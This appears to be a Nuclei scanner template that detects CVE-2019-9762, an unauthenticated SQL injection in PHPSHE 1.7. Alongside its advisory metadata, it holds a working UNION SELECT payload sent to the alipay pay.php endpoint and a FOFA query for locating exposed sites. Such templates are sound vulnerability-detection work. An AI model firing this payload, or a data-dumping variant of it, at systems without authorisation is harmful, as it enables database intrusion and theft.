id: CVE-2019-9762

info:
  name: PHPSHE 1.7 - SQL Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    A SQL Injection was discovered in PHPSHE 1.7 in include/plugin/payment/alipay/pay.php with the parameter id. The vulnerability does not need any authentication.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to the latest version of PHPSHE or apply security patches to sanitize input parameters.
  reference:
    - https://gitee.com/koyshe/phpshe/issues/ITC0C
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9762
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-9762
    cwe-id: CWE-89
    epss-score: 0.53524
    epss-percentile: 0.98034
    cpe: cpe:2.3:a:phpshe:phpshe:1.7:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: phpshe
    product: phpshe
    fofa-query: app="PHPSHE"
  tags: cve,cve2019,phpshe,sqli,vkev,vuln

variables:
  num: "999999999"

http:
  - raw:
      - |
        GET /include/plugin/payment/alipay/pay.php?id=pay%20where%201=1%20union%20select%201,2,CONCAT(md5({{num}})),4,5,6,7,8,9,10,11,12%23_ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'
# digest: 490a0046304402203541de8fde4bce446ed4942af713ba5d501cbf723d3af06470242560bd123c2402207ca319ec45820fc3696c49e66ece7909c2c93af9b022ae34c144ff1e68723e9d:922c64590222798bb761d5b6d8e72950